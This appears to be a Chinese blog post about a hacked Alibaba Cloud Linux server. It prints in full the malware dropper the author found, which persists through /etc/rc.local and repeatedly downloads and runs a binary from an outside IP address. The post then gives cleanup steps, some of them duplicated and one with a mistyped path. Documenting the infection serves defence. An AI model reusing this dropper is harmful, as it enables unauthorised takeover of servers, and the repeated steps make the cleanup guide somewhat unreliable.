今天接到簡訊 阿里雲Linux伺服器被黑
指令碼如下:
- echo "sh /etc/chongfu.sh &" >> /etc/rc.local : 開機自啟動
- 自動下載 ./wget -P /tmp/ http://61.147.198.172/zsqs &> /dev/null
- Centos_sshd_killn=$(ps aux | grep "/tmp/zsqs" | grep -v grep | wc -l) 找zsqs有多少個,kill 防止啟動多個例項
#!/bin/bash
#Welcome like-minded friends to come to exchange.
#We are a group of people who have a dream.
# qun:10776621
# 2016-06-14
if [ "sh /etc/chongfu.sh &" = "$(cat /etc/rc.local | grep /etc/chongfu.sh | grep -v grep)" ]; then
echo ""
else
echo "sh /etc/chongfu.sh &" >> /etc/rc.local
fi
while [ 1 ]; do
Centos_sshd_killn=$(ps aux | grep "/tmp/zsqs" | grep -v grep | wc -l)
if [[ $Centos_sshd_killn -eq 0 ]]; then
if [ ! -f "/tmp/zsqs" ]; then
if [ -f "/usr/bin/wget" ]; then
cp /usr/bin/wget .
chmod +x wget
#./wget -P . http://61.147.198.172/zsqs
./wget -P /tmp/ http://61.147.198.172/zsqs &> /dev/null
chmod 755 /tmp/zsqs
rm wget -rf
else
echo "No wget"
fi
fi
/tmp/zsqs &
#./zsqs &
elif [[ $Centos_sshd_killn -gt 1 ]]; then
for killed in $(ps aux | grep "zsqs" | grep -v grep | awk '{print $2}'); do
Centos_sshd_killn=$(($Centos_sshd_killn-1))
if [[ $Centos_sshd_killn -eq 1 ]]; then
continue
else
kill -9 $killed
fi
done
else
echo ""
fi
Centos_ssh_killn=$(ps aux | grep "/tmp/zsqs" | grep -v grep | wc -l)
if [[ $Centos_ssh_killn -eq 0 ]]; then
if [ ! -f "/tmp/zsqs" ]; then
if [ -f "/usr/bin/wget" ]; then
cp /usr/bin/wget .
chmod +x wget
#./wget -P . http://61.147.198.172/zsqs
./wget -P /tmp/ http://61.147.198.172/zsqs &> /dev/null
chmod 755 /tmp/zsqs
rm wget -rf
else
echo "No wget"
fi
fi
/tmp/zsqs &
#./zsqs &
elif [[ $Centos_ssh_killn -gt 1 ]]; then
for killed in $(ps aux | grep "zsqs" | grep -v grep | awk '{print $2}'); do
Centos_ssh_killn=$(($Centos_ssh_killn-1))
if [[ $Centos_ssh_killn -eq 1 ]]; then
continue
else
kill -9 $killed
fi
done
else
echo ""
fi
sleep 600
done
簡單解決步驟:
1. 結束程式
ps aux | grep "zsqs" | grep -v grep | awk '{print $2}'| xargs kill -9
2. 清除自動啟動指令碼
vim /etc/rc.local 去掉 sh /etc/chongfu.sh &
3. 清除 指令碼
rm -rf /etc/chongfu.sh /tem/chongfu.sh /tmp/zsqs
4. 修改登入密碼
passwd
vim /etc/rc.local 去掉 sh /etc/chongfu.sh &
3. 清除 指令碼
rm -rf /etc/chongfu.sh /tem/chongfu.sh /tmp/zsqs
4. 修改登入密碼
passwd
5.重啟。
reboot
存在風險 :
zsqs是可執行檔案 不知道有沒有 替換果我的系統檔案 或者執行過隱藏啟動命令 在排查吧 今天就到這兒了